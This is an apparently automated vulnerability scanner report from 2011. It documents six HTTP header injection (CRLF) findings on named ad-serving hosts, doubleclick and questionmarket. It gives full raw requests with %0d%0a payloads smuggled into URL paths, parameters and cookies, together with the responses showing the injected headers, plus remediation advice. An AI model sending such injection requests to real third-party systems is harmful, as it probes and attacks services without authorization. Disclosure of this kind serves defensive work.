HTTP Header Injection, CWE-113, 0x20, DORK, CRLF Sequences, Unvalidated Data

CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')

Report generated by XSS.CX at Thu Mar 24 06:42:56 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Loading

1. HTTP header injection

1.1. http://ad.doubleclick.net/activity [REST URL parameter 1]

1.2. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]

1.3. http://amch.questionmarket.com/adsc/d767733/32/39885080/decide.php [ES cookie]

1.4. http://amch.questionmarket.com/adsc/d847178/33/873120/decide.php [ES cookie]

1.5. http://amch.questionmarket.com/adscgen/st.php [code parameter]

1.6. http://amch.questionmarket.com/adscgen/st.php [site parameter]


1. HTTP header injection
There are 6 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

1.1. http://ad.doubleclick.net/activity [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7417c%0d%0a297173bfef5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7417c%0d%0a297173bfef5;src=2183402;type=count651;cat=msnbc778;ord=1;num=3690324346534.9077? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7417c
297173bfef5;src=2183402;type=count651;cat=msnbc778;ord=1;num=3690324346534.9077:
Date: Tue, 22 Mar 2011 21:10:41 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
1.2. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 36536%0d%0a5454fc8cde7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dot.gif36536%0d%0a5454fc8cde7?1300827947273781 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gif36536
5454fc8cde7:
Date: Tue, 22 Mar 2011 21:11:44 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
1.3. http://amch.questionmarket.com/adsc/d767733/32/39885080/decide.php [ES cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d767733/32/39885080/decide.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload 742c8%0d%0a9667ec60356 was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request

GET /adsc/d767733/32/39885080/decide.php?ord=1300827943 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N2958.autos.yahoo.com/B4209191.99;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15pnu34kn/M=761929.14055346.14404107.10116998/D=autos/S=96432900:LREC/_ylt=AsH3NWCu76ArMfLU.kHOPv8Ec78F/Y=YAHOO/EXP=1300835134/L=MdjAjGKIR.ZqhH8YTVvEVQbhrcHW802JDx4ACrMm/B=OxblUEwNPHc-/J=1300827934833302/K=Tr5eHXYB8Dh6UqjftbxuWg/A=6340055/R=0/*;ord=0.7362037342973053?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_885679-3-1_500004689310-8-1_500004699231-8-1_40909683-8-1_600001431304-4-1_40243846-7-1_725047-17-2_40682242-2-1_200198554191-4-1; ES=742c8%0d%0a9667ec60356

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 21:11:54 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a231.dl
Set-Cookie: CS1=deleted; expires=Mon, 22-Mar-2010 21:11:53 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_885679-3-1_500004689310-8-1_500004699231-8-1_40909683-8-1_600001431304-4-1_40243846-7-1_725047-17-2_40682242-2-1_200198554191-4-1_39885080-32-1; expires=Sat, 12-May-2012 13:11:54 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=742c8
9667ec60356_767733-ptbzM-0; expires=Sat, 12-May-2012 13:11:54 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;
1.4. http://amch.questionmarket.com/adsc/d847178/33/873120/decide.php [ES cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d847178/33/873120/decide.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload 8a7e9%0d%0a76a6327601b was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request

GET /adsc/d847178/33/873120/decide.php?ord=1300827952 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_885679-3-1_500004689310-8-1_500004699231-8-1_40909683-8-1_600001431304-4-1_40243846-7-1_725047-17-2_40682242-2-1_200198554191-4-1_39885080-32-1; ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5B_875649-nl:xM-0_876089-xh:xM-~/_848331-7h6yM-0_724925-CiqyM-KC_877350-^IwyM-0_862189-u9`xM-z^H1_767733-TpbzM-08a7e9%0d%0a76a6327601b

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 21:12:01 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a231.dl
Set-Cookie: CS1=deleted; expires=Mon, 22-Mar-2010 21:12:00 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_885679-3-1_500004689310-8-1_500004699231-8-1_40909683-8-1_600001431304-4-1_40243846-7-1_725047-17-2_40682242-2-1_200198554191-4-1_39885080-32-1_873120-33-1; expires=Sat, 12-May-2012 13:12:01 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5B_875649-nl:xM-0_876089-xh:xM-~/_848331-7h6yM-0_724925-CiqyM-KC_877350-^IwyM-0_862189-u9`xM-z^H1_767733-TpbzM-08a7e9
76a6327601b_847178-wtbzM-0; expires=Sat, 12-May-2012 13:12:01 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;
1.5. http://amch.questionmarket.com/adscgen/st.php [code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The value of the code request parameter is copied into the Location response header. The payload 7a8e5%0d%0a6515a1149ba was submitted in the code parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/st.php?survey_num=767733&site=47514390&code=7a8e5%0d%0a6515a1149ba&randnum=4114446 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N2958.autos.yahoo.com/B4209191.99;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15pnu34kn/M=761929.14055346.14404107.10116998/D=autos/S=96432900:LREC/_ylt=AsH3NWCu76ArMfLU.kHOPv8Ec78F/Y=YAHOO/EXP=1300835134/L=MdjAjGKIR.ZqhH8YTVvEVQbhrcHW802JDx4ACrMm/B=OxblUEwNPHc-/J=1300827934833302/K=Tr5eHXYB8Dh6UqjftbxuWg/A=6340055/R=0/*;ord=0.7362037342973053?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_885679-3-1_500004689310-8-1_500004699231-8-1_40909683-8-1_600001431304-4-1_40243846-7-1_725047-17-2_40682242-2-1_200198554191-4-1; ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5B_875649-nl:xM-0_876089-xh:xM-~/_848331-7h6yM-0_724925-CiqyM-KC_877350-^IwyM-0_862189-u9`xM-z^H1

Response

HTTP/1.1 302 Found
Date: Tue, 22 Mar 2011 21:11:41 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a209.dl
Set-Cookie: CS1=deleted; expires=Mon, 22-Mar-2010 21:11:40 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_885679-3-1_500004689310-8-1_500004699231-8-1_40909683-8-1_600001431304-4-1_40243846-7-1_725047-17-2_40682242-2-1_200198554191-4-1_767733-1-1; expires=Sat, 12-May-2012 13:11:41 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5B_875649-nl:xM-0_876089-xh:xM-~/_848331-7h6yM-0_724925-CiqyM-KC_877350-^IwyM-0_862189-u9`xM-z^H1_767733-ctbzM-0; expires=Sat, 12-May-2012 13:11:41 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=DART&survey_num=767733&site=32-47514390-&code=7a8e5
6515a1149ba
Content-Length: 0
Content-Type: text/html

1.6. http://amch.questionmarket.com/adscgen/st.php [site parameter]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The value of the site request parameter is copied into the Location response header. The payload 2bd0d%0d%0ad06ad6d5e0d was submitted in the site parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/st.php?survey_num=767733&site=2bd0d%0d%0ad06ad6d5e0d&code=39885080&randnum=4114446 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N2958.autos.yahoo.com/B4209191.99;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15pnu34kn/M=761929.14055346.14404107.10116998/D=autos/S=96432900:LREC/_ylt=AsH3NWCu76ArMfLU.kHOPv8Ec78F/Y=YAHOO/EXP=1300835134/L=MdjAjGKIR.ZqhH8YTVvEVQbhrcHW802JDx4ACrMm/B=OxblUEwNPHc-/J=1300827934833302/K=Tr5eHXYB8Dh6UqjftbxuWg/A=6340055/R=0/*;ord=0.7362037342973053?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_885679-3-1_500004689310-8-1_500004699231-8-1_40909683-8-1_600001431304-4-1_40243846-7-1_725047-17-2_40682242-2-1_200198554191-4-1; ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5B_875649-nl:xM-0_876089-xh:xM-~/_848331-7h6yM-0_724925-CiqyM-KC_877350-^IwyM-0_862189-u9`xM-z^H1

Response

HTTP/1.1 302 Found
Date: Tue, 22 Mar 2011 21:11:40 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a210.dl
Set-Cookie: CS1=deleted; expires=Mon, 22-Mar-2010 21:11:39 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_885679-3-1_500004689310-8-1_500004699231-8-1_40909683-8-1_600001431304-4-1_40243846-7-1_725047-17-2_40682242-2-1_200198554191-4-1_767733-1-1; expires=Sat, 12-May-2012 13:11:40 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5B_875649-nl:xM-0_876089-xh:xM-~/_848331-7h6yM-0_724925-CiqyM-KC_877350-^IwyM-0_862189-u9`xM-z^H1_767733-btbzM-0; expires=Sat, 12-May-2012 13:11:40 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=DART&survey_num=767733&site=-1-2bd0d
d06ad6d5e0d-&code=39885080
Content-Length: 0
Content-Type: text/html

Report generated by XSS.CX at Thu Mar 24 06:42:56 CDT 2011.